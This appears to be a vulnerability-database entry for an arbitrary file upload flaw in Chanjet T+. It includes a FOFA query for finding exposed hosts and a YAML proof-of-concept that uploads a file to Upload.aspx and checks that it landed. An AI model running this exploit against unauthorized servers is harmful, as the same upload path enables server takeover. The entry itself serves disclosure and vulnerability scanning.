CNVD-2022-60632: 畅捷通T+ SetupAccount 任意文件上传

日期: 2025-09-01 | 影响软件: 畅捷通T+ SetupAccount | POC: 已公开

漏洞描述

畅捷通T+ Upload.aspx处存在任意文件上传漏洞,攻击者可以从其中获取服务器权限。 fofa:app="畅捷通-TPlus" && icon_hash="-2067519629"

PoC代码[已公开]

id: CNVD-2022-60632

info:
  name: 畅捷通T+ SetupAccount 任意文件上传
  author: zan8in
  severity: critical
  verified: true
  description: |
    畅捷通T+ Upload.aspx处存在任意文件上传漏洞,攻击者可以从其中获取服务器权限。
    fofa:app="畅捷通-TPlus" && icon_hash="-2067519629"
  tags: cnvd,cnvd2022,chanjet,fileupload
  created: 2024/12/30

set:
  randstr: randomLowercase(20)
  randbody: randomLowercase(32)
  rboundary: randomLowercase(8)
rules:
  r0:
    request:
      method: POST
      path: /tplus/SM/SetupAccount/Upload.aspx?preload=1
      headers:
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
      body: |
        ------WebKitFormBoundary{{rboundary}}
        Content-Disposition: form-data; name="File1";filename="{{randstr}}.html"
        Content-Type: image/jpeg

        {{randbody}}
        ------WebKitFormBoundary{{rboundary}}--
    expression: response.status == 200
  r1:
    request:
      method: GET
      path: /tplus/SM/SetupAccount/images/{{randstr}}.html
    expression: response.status == 200 && response.body.bcontains(bytes(randbody))
expression: r0() && r1()

相关漏洞推荐